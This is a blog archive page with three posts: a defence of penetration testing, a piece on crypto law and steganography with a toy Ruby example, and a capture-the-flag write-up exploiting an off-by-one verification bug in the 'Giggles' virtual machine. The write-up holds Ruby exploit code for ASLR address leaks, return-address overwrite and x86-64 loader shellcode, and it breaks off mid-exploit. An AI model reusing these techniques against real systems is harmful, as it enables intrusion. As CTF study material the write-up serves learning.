Monthly Archives: January 2015

In Defense of Ethical Hacking

Pete Herzog wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise consider fairly sane and smart (see his bio), gets the premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused about where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here are my comments on Pete’s blog post, titled “The Myth of Ethical Hacking”:

I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure; it’s done because business and technology, along with your adversaries, are dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple difference in word choice. Isn’t this all about validating the security an organization thinks it has against the reality of how attackers act and what they will target? I guess I could be wrong, but these terms (vulnerability testing, penetration testing, ethical hacking, security testing) create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I think this is one reason standards efforts by people in the security testing space were started: to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
— Now, here’s a statement that I largely agree with. It’s not controversial anymore to say this. This is why things like the PTES (Penetration Testing Execution Standard) were born. Taking a look at the people who are behind this standard, you can easily see that it’s not just another shot in the dark or empty effort; it’s a serious attempt at standardizing how a penetration test (or ethical hack; these should be the same thing in my mind) is performed. Let me address red teaming for a minute too. Red Team exercises are not the same thing as penetration testing and ethical hacking — not really — it’s like the difference between asking someone if they can pick the lock on the front door, versus daring someone to break into your house and steal your passport without reservation. Red Teaming is a more aggressive approach. I’ve heard some call Red Team exercises “closer to what an actual attacker would behave like”; your mileage may vary on that one. Bottom line, though, you always get the quality you ask for (pay for). If you are willing to pay for high-grade talent, generally speaking you’ll get high-grade talent. If you’re looking for a cheap penetration test, your results will likely be vastly different, because the resources on the job may not be as senior or knowledgeable. The other thing here is this — not all penetration testers are experts in all of the technologies at your shop. Keep this in mind. Some folks are magicians with a Linux/Unix system, while others have grown their expertise in the Windows world. Some are web application experts, some are infrastructure experts, and some are generalists. The bottom line is that this is both true, something that should be accounted for, and largely not the fault of the tester.
Then again nearly everything has a positive side we can see if we squint. And as a practical, shake-the-CEO-into-awareness technique, criminal hacking simulations should be good for fostering change in a security posture.
— I read this and wonder to myself… if the CEO hasn’t already been “shaken into awareness” through headlines in the papers and nightly news, then there is something else going on here that a successful ethical hack ransack of the enterprise likely won’t solve.
So somehow, ethical hackers with their penetration testing and red-teaming, despite any flaws, have taken on this status of better security than, say, vulnerability scanning. Because there’s a human behind it? Is it artisan, and thus we pay more?
— Wait, what?! If you see these two as equal, then you’ve either done a horrible job at picking your ethical hacker/penetration testers, or you don’t understand what you’re saying. As someone who spent a few years demonstrating to companies that web application security tools were critical to their success, I’ve never, ever said they can replace a human tester. Ever. To answer the question directly — YES, because there’s a human behind it, this is an entirely different thing. See above about quality of penetration tester, but the point stands.
It also has a fatal flaw: It tests for known vulnerabilities. However, in great marketing moves of the world volume 1, that is exactly how they promote it. That’s why companies buy it. But if an ethical hacker markets that they test only for known vulnerabilities, we say they suck.
— Oh, I think I see what’s going on here. The author is confusing vulnerability assessment with penetration testing, maybe. That’s the only logical explanation I can think of. Penetration testers have a massive advantage over scanning tools because of this wonderful thing called the human intellect. They can see and interpret errors that systems kick back. Tools look for patterns and respond accordingly, so there are times when a human can see an error message and understand what it’s implying, but the machine has no such ability. In spite of all of technology’s advancements, tools are still using regular expressions and some rudimentary if-then clauses for pattern recognition. Machines, and by extension software, do not think. This gives software a disadvantage against a human 100% of the time.
Now vulnerability scanning is indeed reactive. We wait for known flaws to be known, scan for them, and we then react to that finding by fixing it. Ethical hacking is indeed proactive. But not because it gives the defender omniscient threat awareness, but rather so we can know all the ways where someone can break in. Then we can watch for it or even fix it.
— I’m going to ignore the whole reactive vs. proactive debate here; I don’t believe it’s productive to this post, and I think many people don’t understand what these terms mean in security anyway. First, you’ll never, ever know “all the ways someone can break in”. Never. That’s the beauty of the human mind. Human beings are a creative bunch, and when properly incentivized, we will find a way once we’ve exhausted all the known ways. However, there’s a caveat here, which I don’t believe is talked about enough. The reason we won’t ever know all the ways someone can break in, even if we give humans the ability to find all the ways, is scope and time. Penetration testers, ethical hackers, and whatever else you want to call them are time-boxed. Rarely do you get an open-ended contract or, even in the case of an internal resource, the ability to dedicate all the time you have to the task of finding ways to break in. Furthermore, there are typically many, many, many ways to break in. Systems can be misconfigured, unpatched, and left exposed in a million different ways. And even if you did have all the time you needed, these systems are dynamic and are going to change on you at some point, unless you work in one of "those" organizations, and if so then you’ve got bigger problems.
But does it really work that way? Isn’t what passes for ethical hacking too often just running vulnerability scanners to find the low hanging fruit and exploit that to prove a criminal could get in? Isn’t that really just finding known vulnerabilities like a vulnerability scanner does, but with a little verification thrown in?
— And here it is. Let me answer this question from the many, many people I know who do actual ethical hacking/penetration testing: no. Also if you find this to be actually true in your experience, you’re getting the wrong penetration testers. Maybe fire your provider or staff.
There’s this myth that ethical hackers will make better security by breaking through existing security in complicated, sometimes clever ways that point out the glaring flaw(s) of the moment for remediation.
— Talk to someone who does serious penetration testing for a living, or manages one of these teams. Many of them have a store of clever, custom code up their sleeves but rarely have to use it because the systems they test have so much broken on them that dropping custom code isn’t even remotely necessary.
But we know that all too often it’s just vulnerability scanning with scare tactics.
— Again, you’re dealing with some seriously amateur, bad people or providers. Fire them.
And when there’s no way in, they play the social engineering card.
— a) I don’t see the issue with this approach, b) there’s a 99.9% chance there is a way in without “playing the social engineering card”.
One of the selling points of ethical hacking is the skilled use of social engineering. Let me save you some money: It works.
— Yes, 90%+ of the time, even when the social engineer isn’t particularly skilled, it works. Why? Human nature. Also, employees who don’t know better. So what if it works, though? You still need to leverage that testing to show real-life use cases of how your defenses were easily penetrated, for educational purposes. Record it. Highlight the employees who let that guy with the 4 coffee cups in his hands through the turnstile without asking for a badge… but do it constructively, so that they and their peers will remember. Testing should drive awareness, and real-life use cases are priceless.
So if ethical hacking as it’s done is a myth…
— Let me stop you right there. It’s not; you’ve just had some terrible experiences that I don’t believe are indicative of the wider industry. And since the rest of the article is based on this premise, I think we’re done here.

Plausible Deniability – The Impact of Crypto Law

So, after the recent terror attacks in Paris, the UK suffered from the usual knee-jerk reactions from the technologically-challenged chaps we have governing us. “Let’s ban encryption the Government can’t crack”, they say. Many people mocked this, saying that terrorists were flouting laws anyway, so why would they obey the rules on crypto? How would companies that rely on crypto do business in the UK (that’s everyone, by the way)?

Well, I’m not going to dwell on those points, because I am rather late to the party in writing this piece, and because those points are boring :) In any case, if the Internet went all plaintext on us, web filtering would be a whole lot easier, and Smoothwall’s HTTPS features wouldn’t be quite so popular!

If the real intent of the law is to be able to arrest someone just for having or sending encrypted data (the equivalent of arresting someone for looking funny, or for stepping on the cracks in the pavement), what would our miscreants do next?

Well, the idea we need to explore is “plausible deniability”. For example, you are a De Niro-esque mafia enforcer. You need to carry a baseball bat for the commission of your illicit work. If you want to be able to fool the local law enforcement, you might also carry a baseball. “I’m going to play baseball, officer” (may not go down well at 3 in the morning when you have a corpse in the back seat of your car, but it’s a start). You conceal your weapon among things that make it look normal. It is possible to conceal the cryptography “weapon” in the same way, so that law enforcement can’t see it’s there and therefore can’t arrest anyone. Is it possible to say “sorry officer, no AES256 here, just a picture of a kitteh”? If so, you have plausible deniability.

What’s the crypto equivalent? Steganography. The idea of hiding a message inside other data, such that it is very hard to prove a hidden message is there at all. Here’s an example:

This image of a slightly irritated looking cat in a shoebox contains a short message. It will be very hard to find, because the original image is only on my hard disk, so you have nothing to compare it to. There are many steganographic methods for hiding the text, and the text is extremely short by comparison to the image. If I had encrypted the text… well, you would find it even harder, because you couldn’t even look for words. It is left as an exercise for the reader to tell me in a comment what the message is.
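To make the idea concrete, here’s a toy sketch of least-significant-bit steganography in Ruby. The helper names are mine, and a real image would need a proper decoder (a PNG library, say); here we stand in for the image with a plain array of 8-bit pixel values:

```ruby
# Toy LSB steganography: hide one bit of the message in the lowest bit of
# each 8-bit pixel value. Changing a channel value by at most 1 is
# invisible to the eye, and statistically hard to prove without the original.
def embed(pixels, message)
  bits = message.unpack1('B*').chars.map(&:to_i)
  pixels.each_with_index.map do |pixel, i|
    i < bits.length ? (pixel & ~1) | bits[i] : pixel
  end
end

def extract(pixels, byte_count)
  bits = pixels.take(byte_count * 8).map { |pixel| pixel & 1 }.join
  [bits].pack('B*')
end

pixels = Array.new(64) { rand(256) }   # stand-in for image pixel data
stego  = embed(pixels, 'hi')
extract(stego, 2)                      # => "hi"
```

Encrypt the message before embedding and there isn’t even a recognizable plaintext to search for.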

GitS 2015: Giggles (off-by-one virtual machine)

Welcome to part 3 of my Ghost in the Shellcode writeup! Sorry for the delay, I actually just moved to Seattle. On a sidenote, if there are any Seattle hackers out there reading this, hit me up and let's get a drink!

Now, down to business: this writeup is about one of the Pwnage 300 levels; specifically, Giggles, which implements a very simple and very vulnerable virtual machine. You can download the binary here, the source code here (with my comments - I put XXX near most of the vulnerabilities and bad practices I noticed), and my exploit here.

One really cool aspect of this level was that they gave source code, a binary with symbols, and even a client (that's the last time I'll mention their client, since I dislike Python :) )! That means we could focus on exploitation and not reversing!

The virtual machine

I'll start by explaining how the virtual machine actually works. If you worked on this level yourself, or you don't care about the background, you can just skip over this section.

Basically, there are three operations: TYPE_ADDFUNC, TYPE_VERIFY, and TYPE_RUNFUNC.

The usual process is that the user adds a function using TYPE_ADDFUNC, which is made up of one (possibly zero?) or more operations. Then the user verifies the function, which checks for bounds violations and stuff like that. Then if that succeeds, the user can run the function. The function can take up to 10 arguments and output as much as it wants.

There are only seven different opcodes (types of operations), and one of the tricky parts is that none of them deal with absolute values—only other registers. They are:

  • OP_ADD reg1, reg2 - add two registers together, and store the result in reg1
  • OP_BR <addr> - branch (jump) to a particular instruction - the granularity of these jumps is actually per-instruction, not per-byte, so you can't jump into the middle of another instruction, which ruined my initial instinct :(
  • OP_BEQ <addr> <reg1> <reg2> / OP_BGT <addr> <reg1> <reg2> - branch if equal and branch if greater than are basically the same as OP_BR, except the jumps are conditional
  • OP_MOV <reg1> <reg2> - set reg1 to equal reg2
  • OP_OUT <reg> - output a register (gets returned as a hex value by RUNFUNC)
  • OP_EXIT - terminate the function

To expand on the output just a bit - the program maintains the output in a buffer that's basically a series of space-separated hex values. At the end of the program (when it either terminates or OP_EXIT is called), it's sent back to the client. I was initially worried that I would have to craft some hex-with-spaces shellcode, but thankfully that wasn't necessary. :)
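For what it’s worth, that hex-with-spaces output buffer is trivial to turn back into integers on the client side; a one-liner sketch:

```ruby
# Parse the interpreter's output buffer: space-separated hex words
result = "41 42fd35d8 "
values = result.split.map { |word| word.to_i(16) }
# values == [0x41, 0x42fd35d8]
```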

There are 10 different registers that can be accessed. Each one is 32 bits. The operand values, however, are all 64-bit values.

The verification process basically ensures that the registers and the addresses are mostly sane. Once it's been validated, a flag is switched and the function can be called. If you call the function before verifying it, it'll fail immediately. If you could use arbitrary, unverified bytecode instructions, you'd be able to address register 1000000, say, and read/write elsewhere in memory. They wanted to prevent that.

Speaking of the vulnerability, the bug that leads to full code execution is in the verify function - can you find it before I tell you?

The final thing to mention is arguments: when you call TYPE_RUNFUNC, you can pass up to I think 10 arguments, which are 32-bit values that are placed in the first 8 registers.

Fixing the binary

I've gotten pretty efficient at patching binaries for CTFs! I've talked about this before, so I'll just mention what I do briefly.

I do these things immediately, before I even start working on the challenge:

  • Replace the call to alarm() with NOPs
  • Replace the call to fork() with "xor eax, eax", followed by NOPs
  • Replace the call to drop_privs() with NOPs (if I can find it)

That way, the process won't be killed after a timeout, and I can debug it without worrying about child processes holding onto ports and other irritations. NOPing out drop_privs() means I don't have to worry about adding a user or running it as root or creating a folder for it. If you look at the objdump outputs diffed, here's what it looks like:

--- a   2015-01-27 13:30:29.000000000 -0800
+++ b   2015-01-27 13:30:31.000000000 -0800
@@ -1,5 +1,5 @@

-giggles:     file format elf64-x86-64
+giggles-fixed:     file format elf64-x86-64

 Disassembly of section .interp:
@@ -1366,7 +1366,10 @@
     125b:      83 7d f4 ff             cmp    DWORD PTR [rbp-0xc],0xffffffff
     125f:      75 02                   jne    1263 <loop+0x3d>
     1261:      eb 68                   jmp    12cb <loop+0xa5>
-    1263:      e8 b8 fc ff ff          call   f20 <fork@plt>
+    1263:      31 c0                   xor    eax,eax
+    1265:      90                      nop
+    1266:      90                      nop
+    1267:      90                      nop
     1268:      89 45 f8                mov    DWORD PTR [rbp-0x8],eax
     126b:      83 7d f8 ff             cmp    DWORD PTR [rbp-0x8],0xffffffff
     126f:      75 02                   jne    1273 <loop+0x4d>
@@ -1374,14 +1377,26 @@
     1273:      83 7d f8 00             cmp    DWORD PTR [rbp-0x8],0x0
     1277:      75 48                   jne    12c1 <loop+0x9b>
     1279:      bf 1e 00 00 00          mov    edi,0x1e
-    127e:      e8 6d fb ff ff          call   df0 <alarm@plt>
+    127e:      90                      nop
+    127f:      90                      nop
+    1280:      90                      nop
+    1281:      90                      nop
+    1282:      90                      nop
     1283:      48 8d 05 b6 1e 20 00    lea    rax,[rip+0x201eb6]        # 203140 <USER>
     128a:      48 8b 00                mov    rax,QWORD PTR [rax]
     128d:      48 89 c7                mov    rdi,rax
-    1290:      e8 43 00 00 00          call   12d8 <drop_privs_user>
+    1290:      90                      nop
+    1291:      90                      nop
+    1292:      90                      nop
+    1293:      90                      nop
+    1294:      90                      nop
     1295:      8b 45 ec                mov    eax,DWORD PTR [rbp-0x14]
     1298:      89 c7                   mov    edi,eax

I just use a simple hex editor on Windows, xvi32.exe, to take care of that. But you can do it in countless other ways, obviously.

What's wrong with verifyBytecode()?

Have you found the vulnerability yet?

I'll give you a hint: look at the comparison operators in this function:

int verifyBytecode(struct operation * bytecode, unsigned int n_ops)
{
    unsigned int i;

    for (i = 0; i < n_ops; i++) {
        switch (bytecode[i].opcode) {
            case OP_MOV:
            case OP_ADD:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                break;

            case OP_OUT:
                if (bytecode[i].operand1 > NUM_REGISTERS)
                    return 0;
                break;

            case OP_BR:
                if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;

            case OP_BEQ:
            case OP_BGT:
                if (bytecode[i].operand2 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand3 > NUM_REGISTERS)
                    return 0;
                else if (bytecode[i].operand1 > n_ops)
                    return 0;
                break;

            case OP_EXIT:
                return 0;
        }
    }

    return 1;
}

Notice the comparison operators? Every check uses > instead of >=, so a value equal to the maximum (NUM_REGISTERS, or n_ops) slips through. Valid register indices run from 0 to NUM_REGISTERS - 1, so letting bytecode reference register NUM_REGISTERS is an off-by-one error. Oops!
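To see why > is the wrong operator, here’s the register bound check transliterated into a couple of lines of Ruby (there are 10 registers, so valid indices are 0 through 9):

```ruby
NUM_REGISTERS = 10   # ten registers, valid indices 0..9

# The buggy bound check from verifyBytecode(): > where >= was needed
def operand_passes_verify?(operand)
  !(operand > NUM_REGISTERS)
end

operand_passes_verify?(9)    # => true  (the last valid register)
operand_passes_verify?(10)   # => true  (one past the end -- the bug!)
operand_passes_verify?(11)   # => false
```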

Information leak

There are actually a lot of small issues in this code. The first good one I noticed was actually that you can output one extra register. Here's what I mean (grab my exploit if you want to understand the API):

def demo()
  s = TCPSocket.new(SERVER, PORT)

  ops = []
  ops << create_op(OP_OUT, 10)
  add(s, ops)
  verify(s, 0)
  result = execute(s, 0, [])

  pp result
end

The output of that operation is:
"42fd35d8 "

Which, it turns out, is a memory address that's right after a "call" function. A return address!? Can it be this easy!?

It turns out that, no, it's not that easy. While I could read/write to that address, effectively bypassing ASLR, it turned out to be some left-over memory from an old call. I didn't end up using that leak either; I found a better one!

The actual vulnerability

After finding the off-by-one bug that let me read an extra register, I didn't really think much more about it. Later on, I came back to the verifyBytecode() function and noticed that the BR/BEQ/BGT instructions have the exact same bug! You can branch to the last instruction + 1, where it keeps running unverified memory as if it's bytecode!

What comes after the last instruction in memory? Well, it turns out to be a whole bunch of zeroes (00 00 00 00...), then other functions you've added, verified or otherwise. An instruction is 26 bytes long in memory (two bytes for the opcode, and three 64-bit operands), and an all-zero 26-byte instruction actually maps to "add reg0, reg0", which is nice and safe to do over and over again (although it does screw up the value in reg0).
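Based on that layout (a little-endian 16-bit opcode followed by three 64-bit operands), an instruction can be sketched in Ruby like this. Note that create_op here is my guess at a minimal encoder for illustration, not necessarily byte-for-byte what the challenge's protocol expects:

```ruby
# Hypothetical encoder for one 26-byte instruction: a little-endian 16-bit
# opcode followed by three little-endian 64-bit operands (2 + 3*8 = 26 bytes).
def create_op(opcode, op1 = 0, op2 = 0, op3 = 0)
  [opcode].pack('S<') + [op1, op2, op3].pack('Q<3')
end

add = create_op(0)        # all-zero instruction: "add reg0, reg0"
add.length                # => 26
add.bytes.all?(&:zero?)   # => true
```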

Aligning the interpreter

At this point, it got a bit complicated. Sure, I'd found a way to break out of the sandbox and run unverified code, but it's not as straightforward as you might think.

The problem? The different "functions" in memory (that is, groups of operations) aren't spaced multiples of 26 bytes apart, thanks to headers, so if you break out of one function and into another, you wind up trying to execute bytecode that's somewhat offset.

In other words, if your second function starts at address 0, the interpreter tries to run the bytecode at -12 (give or take). The bytecode at -12 just happens to be the number of instructions in the function, so the first opcode is actually equal to the number of operations (so if you have three operations in the function, the first operation will be opcode 3, or BEQ). Its operands are bits and pieces of the opcodes and operands. Basically, it's a big mess.

To get this working, I wanted to basically just skip over that function altogether and run the third function (which would hopefully be a little better aligned). Basically, I wanted the function to do nothing dangerous, then continue on to the third function.

Here's the code I ended up writing (sorry the formatting isn't great, check out the exploit I linked above to see it better):

# This creates a valid-looking bytecode function that jumps out of bounds,
# then a non-validated function that puts us in a more usable bytecode
# escape
def init()
  puts("[*] Connecting to #{SERVER}:#{PORT}")
  s = TCPSocket.new(SERVER, PORT)
  #puts("[*] Connected!")

  ops = []

  # This branches to the second instruction - which doesn't exist
  ops << create_op(OP_BR, 1)
  add(s, ops)
  verify(s, 0)

  # This little section takes some explaining. Basically, we've escaped the bytecode
  # interpreter, but we aren't aligned properly. As a result, it's really irritating
  # to write bytecode (for example, the code of the first operation is equal to the
  # number of operations!)
  # Because there are 4 opcodes below, it performs opcode 4, which is 'mov'. I ensure
  # that both operands are 0, so it does 'mov reg0, reg0'.
  # After that, the next one is a branch (opcode 1) to offset 3, which effectively
  # jumps past the end and continues on to the third set of bytecode, which is our
  # ultimate payload.

  ops = []
  # (operand = count)
  #                  |--|               |---|                                          <-- inst1 operand1 (0 = reg0)
  #                          |--------|                    |----|                      <-- inst1 operand2 (0 = reg0)
  #                                                                        |--|        <-- inst2 opcode (1 = br)
  #                                                                  |----|            <-- inst2 operand1
  ops << create_op(0x0000, 0x0000000000000000, 0x4242424242000000, 0x00003d0001434343)
  #                  |--|              |----|                                          <-- inst2 operand1
  ops << create_op(0x0000, 0x4444444444000000, 0x4545454545454545, 0x4646464646464646)
  # The values of these don't matter, as long as we still have 4 instructions
  ops << create_op(0xBBBB, 0x4747474747474747, 0x4848484848484848, 0x4949494949494949)
  ops << create_op(0xCCCC, 0x4a4a4a4a4a4a4a4a, 0x4b4b4b4b4b4b4b4b, 0x4c4c4c4c4c4c4c4c)

  # Add them
  add(s, ops)

  return s
end

The comments explain it pretty well, but I'll explain it again. :)

The first opcode in the unverified function is, as I mentioned, equal to the number of operations. We create a function with 4 operations, which makes it a MOV instruction. Performing a MOV is pretty safe, especially since reg0 is already screwed up.

The two operands to instruction 1 are parts of the opcodes and operands of the first function. And the opcode for the second instruction is part of the third operand of the first operation we create. Super confusing!

Effectively, this ends up running:

mov reg0, reg0
br 0x3d
; [bad instructions that get skipped]

I'm honestly not sure why I chose 0x3d as the jump distance, I suspect it's just a number that I was testing with that happened to work. The instructions after the BR don't matter, so I just fill them in with garbage that's easy to recognize in a debugger.

So this function effectively does nothing, which is exactly what I wanted.

Getting back in sync

I hoped that the third function would run perfectly, but because of math, it still doesn't. However, the operation count no longer matters in the third function, which is good enough for me! After doing some experiments, I determined that the instructions are unaligned by 0x10 (16) bytes. If you pad the start with 0x10 bytes then add instructions as normal, they'll run completely unverified.

To build the opcodes for the third function, I added a parameter to the add() function that lets you offset things:

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 0x10 (that's how the math worked out)
  add(s, ops, 16)

Now you can run entirely unverified bytecode instructions! That means full read/write/execute of arbitrary addresses relative to the base address of the registers array. That's awesome! Because the registers array is on the stack, we have read/write access relative to a stack address. That means you can trivially read/write the return address and leak addresses of the binary, libc, or anything you want. ASLR bypass and RIP control instantly!

Leaking addresses

There are two separate sets of addresses that need to be leaked. It turns out that even though ASLR is enabled, the addresses don't actually randomize between different connections, so I can leak addresses, reconnect, leak more addresses, reconnect, and run the exploit. It's not the cleanest way to solve the level, but it worked! If this didn't work, I could have written a simple multiplexer bytecode function that does all these things using the same function.

I mentioned I can trivially leak the binary address and a stack address. Here's how:

# This function leaks two addresses: a stack address and the address of
# the binary image (basically, defeating ASLR)
def leak_addresses()
  puts("[*] Bypassing ASLR by leaking stack/binary addresses")
  s = init()

  # There's a stack address at offsets 24/25
  ops = []
  ops << create_op(OP_OUT, 24)
  ops << create_op(OP_OUT, 25)

  # 26/27 is the return address, we'll use it later as well!
  ops << create_op(OP_OUT, 26)
  ops << create_op(OP_OUT, 27)

  # We have to cleanly exit
  ops << create_op(OP_EXIT)

  # Add the list of ops, offset by 0x10 (that's how the math worked out)
  add(s, ops, 16)

  # Run the code
  result = execute(s, 0, [])

  # The result is a space-delimited array of hex values, convert it to
  # an array of integers
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the two values in and do the math to calculate them
  @@registers = ((a[1] << 32) | (a[0])) - 0xc0
  @@base_addr = ((a[3] << 32) | (a[2])) - 0x1efd

  # User output
  puts("[*] Found the base address of the register array: 0x#{@@registers.to_s(16)}")
  puts("[*] Found the base address of the binary: 0x#{@@base_addr.to_s(16)}")
end


Basically, we output registers 24, 25, 26, and 27. Since each register holds only 4 bytes, you have to OUT two consecutive registers to leak one 64-bit address.

Registers 24 and 25 are an address on the stack. The address is 0xc0 bytes above the address of the registers variable (which is the base address of our overflow, and therefore needed for calculating offsets), so we subtract that. I determined the 0xc0 value using a debugger.

Registers 26 and 27 are the return address of the current function, which happens to be 0x1efd bytes into the binary (determined with IDA). So we subtract that value from the result and get the base address of the binary.
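The arithmetic in those two leaks is just recombining 32-bit halves and subtracting a known offset. With made-up leak values (the 0x1efd offset is the one quoted above):

```ruby
# Rebuild a 64-bit address from two 32-bit register dumps (low word first),
# then subtract the fixed file offset to recover the binary's base address.
# The leaked words below are hypothetical.
def combine(lo, hi)
  (hi << 32) | lo
end

lo, hi   = 0x00001efd, 0x00005555   # hypothetical leaked registers 26/27
ret_addr = combine(lo, hi)          # => 0x555500001efd
base     = ret_addr - 0x1efd        # => 0x555500000000
```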

I also found a way to leak a libc address here, but since I never got a copy of libc I didn't bother keeping that code around.

Now that we have the base address of the binary and the address of the registers, we can use the OUT and MOV operations, plus a little bit of math, to read and write anywhere in memory.

Quick aside: getting enough sleep

You may not know this, but I work through CTF challenges very slowly. I like to understand every aspect of everything, so I don't rush. My secret is, I can work tirelessly at these challenges until they're complete. But I'll never win a race.

I got to this point at around midnight, after working nearly 10 hours on this challenge. Most CTFers will wonder why it took 10 hours to get here, so I'll explain again: I work slowly. :)

The problem is, I forgot one very important fact: the operands to each operation are all 64-bit values, even though the arguments and registers themselves are 32-bit. That means an operand can reach from the register array to anywhere in memory. I thought they were 32-bit, however, and since the process is 64-bit I figured I'd be able to read/write the stack, but not addresses in the binary! That wasn't true (I could write anywhere), but I didn't know that. So I was trying a bunch of crazy stack stuff to get it working, but ultimately failed.

At around 2am I gave up and played video games for an hour, then finished the book I was reading. I went to bed about 3:30am, still thinking about the problem. Lying in bed about 4am, it clicked that register numbers could be 64-bit, so I got up and finished it up by about 7am. :)

The moral of this story is: sometimes it pays to get some rest when you're struggling with a problem!

+rwx memory!?

The authors of the challenge must have been feeling extremely generous: they gave us a segment of memory that's readable, writeable, and executable! You can write code to it then run it! Here's where it's declared:

void * JIT;     // TODO: add code to JIT functions


    /* Map 4096 bytes of executable memory */

A pointer to the memory is stored in a global variable. Since we have the ability to read an arbitrary address—once I realized my 64-bit problem—it was pretty easy to read the pointer:

def leak_rwx_address()
  puts("[*] Attempting to leak the address of the mmap()'d +rwx memory...")
  s = init()

  # This offset is always constant, from the binary
  jit_ptr = @@base_addr + 0x20f5c0

  # Read both halves of the address - the read is relative to the stack-
  # based register array, and has a granularity of 4, hence the math
  # I'm doing here
  ops = []
  ops << create_op(OP_OUT, (jit_ptr - @@registers) / 4)
  ops << create_op(OP_OUT, ((jit_ptr + 4) - @@registers) / 4)
  ops << create_op(OP_EXIT)
  add(s, ops, 16)
  result = execute(s, 0, [])

  # Convert the result from a space-delimited hex list to an integer array
  a = result.split(/ /).map { |str| str.to_i(16) }

  # Read the address
  @@rwx_addr = ((a[1] << 32) | (a[0]))

  # User output
  puts("[*] Found the +rwx memory: 0x#{@@rwx_addr.to_s(16)}")
end


Basically, we know the pointer to the JIT code is at @@base_addr + 0x20f5c0 (determined with IDA). So we do some math with that address and the base address of the registers array, dividing by 4 because that's the width of each register.

Finishing up

Now that we can run arbitrary bytecode instructions, we can read, write, and execute any address. But there was one more problem: getting the code into the JIT memory.

It seems pretty straightforward, since we can write to arbitrary memory, but there's a problem: the bytecode language has no way to load an immediate value, which means I can't directly write a bunch of constants to memory. What I could do, however, is write values from registers to memory, and I can set the registers by passing in arguments.

BUT, reg0 gets messed up and two registers are wasted because I have to use them to overwrite the return address. That means I have 7 32-bit registers that I can use.

What you're probably thinking is that I could implement a multiplexer in their assembly language: an operation like "write this dword to this memory address", building up the shellcode by calling the function multiple times with different arguments.

If you're thinking that, then you're sharper than I was at 7am with no sleep! I decided that the best way was to write a shellcode loader in 24 bytes. I actually love writing short, custom-purpose shellcode, there's something satisfying about it. :)

Here's my loader shellcode:

  # Create some loader shellcode. I'm not proud of this - it was 7am, and I hadn't
  # slept yet. I immediately realized after getting some sleep that there was a
  # way easier way to do this...
  params =
    # param0 gets overwritten, just store crap there
    "\x41\x41\x41\x41" +

    # param1 + param2 are the return address
    [@@rwx_addr & 0x00000000FFFFFFFF, @@rwx_addr >> 32].pack("II") +

    # ** Now, we build up to 24 bytes of shellcode that'll load the actual shellcode

    # Decrease ECX to a reasonable number (somewhere between 200 and 10000, doesn't matter)
    "\xC1\xE9\x10" +  # shr ecx, 0x10

    # This is where the shellcode is read from - to save a couple bytes (an absolute move is 10
    # bytes long!), I use r12, which is in the same image and can be reached with a 4-byte add
    "\x49\x8D\xB4\x24\x88\x2B\x20\x00" + # lea rsi,[r12+0x202b88]

    # There is where the shellcode is copied to - immediately after this shellcode
    "\x48\xBF" + [@@rwx_addr + 24].pack("Q") + # mov rdi, @@rwx_addr + 24

    # And finally, this moves the bytes over
    "\xf3\xa4" # rep movsb

  # Pad the shellcode with NOP bytes so it can be used as an array of ints
  while((params.length % 4) != 0)
    params += "\x90"
  end

  # Convert the shellcode to an array of ints
  params = params.unpack("I*")

Basically, the first three arguments are wasted (the first gets messed up and the next two are the return address). Then we set up a call to "rep movsb", with rsi, rdi, and rcx set appropriately (if somewhat awkwardly). You can see how I did that in the comments. All told, it's 23 bytes of machine code.

It took me a lot of time to get that working, though! Squeezing out every single byte! It basically copies the code from the next bytecode function (whose address I can calculate based on r12) to the address immediately after itself in the +RWX memory (which I can leak beforehand).
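For anyone rusty on x86 string instructions: `rep movsb` copies `rcx` bytes from `[rsi]` to `[rdi]`, incrementing both pointers as it goes. Here's a tiny Python model of what the loader accomplishes (flat memory as a bytearray, addresses entirely made up):

```python
def rep_movsb(memory, rsi, rdi, rcx):
    """Model of x86 `rep movsb`: copy rcx bytes from memory[rsi] to memory[rdi]."""
    for i in range(rcx):
        memory[rdi + i] = memory[rsi + i]

# The loader copies the "next" bytecode function (really raw machine code)
# to just after itself in the +rwx buffer:
mem = bytearray(64)
mem[40:48] = b"SHELLCOD"          # pretend this is the stored machine code
rep_movsb(mem, rsi=40, rdi=24, rcx=8)
```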

This code is written to the +RWX memory using these operations:

  ops = []

  # Overwrite the return address with the first two operations
  ops << create_op(OP_MOV, 26, 1)
  ops << create_op(OP_MOV, 27, 2)

  # This next bunch copies shellcode from the arguments into the +rwx memory
  ops << create_op(OP_MOV, ((@@rwx_addr + 0) - @@registers) / 4, 3)
  ops << create_op(OP_MOV, ((@@rwx_addr + 4) - @@registers) / 4, 4)
  ops << create_op(OP_MOV, ((@@rwx_addr + 8) - @@registers) / 4, 5)
  ops << create_op(OP_MOV, ((@@rwx_addr + 12) - @@registers) / 4, 6)
  ops << create_op(OP_MOV, ((@@rwx_addr + 16) - @@registers) / 4, 7)
  ops << create_op(OP_MOV, ((@@rwx_addr + 20) - @@registers) / 4, 8)
  ops << create_op(OP_MOV, ((@@rwx_addr + 24) - @@registers) / 4, 9)

